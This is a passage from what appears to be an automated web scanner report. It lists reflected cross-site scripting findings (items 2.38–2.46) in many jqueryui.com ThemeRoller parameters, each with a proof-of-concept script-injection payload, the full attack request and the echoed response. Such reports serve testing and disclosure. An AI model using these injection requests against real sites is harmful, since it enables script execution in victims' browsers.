GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=209d783"><script>alert(1)</script>2b423fbb9cc&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=209d783"><script>alert(1)</script>2b423fbb9cc&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=6
...[SNIP]...

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf71a"><script>alert(1)</script>3021fc0395e was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20bf71a"><script>alert(1)</script>3021fc0395e&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20bf71a"><script>alert(1)</script>3021fc0395e&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B100
...[SNIP]...

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5df9"><script>alert(1)</script>9a2ba1a34a3 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50e5df9"><script>alert(1)</script>9a2ba1a34a3&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50e5df9"><script>alert(1)</script>9a2ba1a34a3&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055
...[SNIP]...

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 958d8"><script>alert(1)</script>dd7211d45b9 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0958d8"><script>alert(1)</script>dd7211d45b9&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0958d8"><script>alert(1)</script>dd7211d45b9&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" t
...[SNIP]...

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6979a"><script>alert(1)</script>b2a5040142e was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=1006979a"><script>alert(1)</script>b2a5040142e&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
0&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=1006979a"><script>alert(1)</script>b2a5040142e&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.42. http://jqueryui.com/themeroller/ [bgTextureActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e1d"><script>alert(1)</script>60f896847d1 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.pngd7e1d"><script>alert(1)</script>60f896847d1&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.pngd7e1d"><script>alert(1)</script>60f896847d1&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4
...[SNIP]...

2.43. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 865b2"><script>alert(1)</script>175935ab28c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png865b2"><script>alert(1)</script>175935ab28c&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:35 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png865b2"><script>alert(1)</script>175935ab28c&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF
...[SNIP]...

2.44. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725fa"><script>alert(1)</script>a9631e9090e was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png725fa"><script>alert(1)</script>a9631e9090e&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png725fa"><script>alert(1)</script>a9631e9090e&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=
...[SNIP]...

2.45. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db08e"><script>alert(1)</script>da74d127cad was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngdb08e"><script>alert(1)</script>da74d127cad&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngdb08e"><script>alert(1)</script>da74d127cad&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTex
...[SNIP]...

2.46. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14ec"><script>alert(1)</script>5d04dd7c806 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

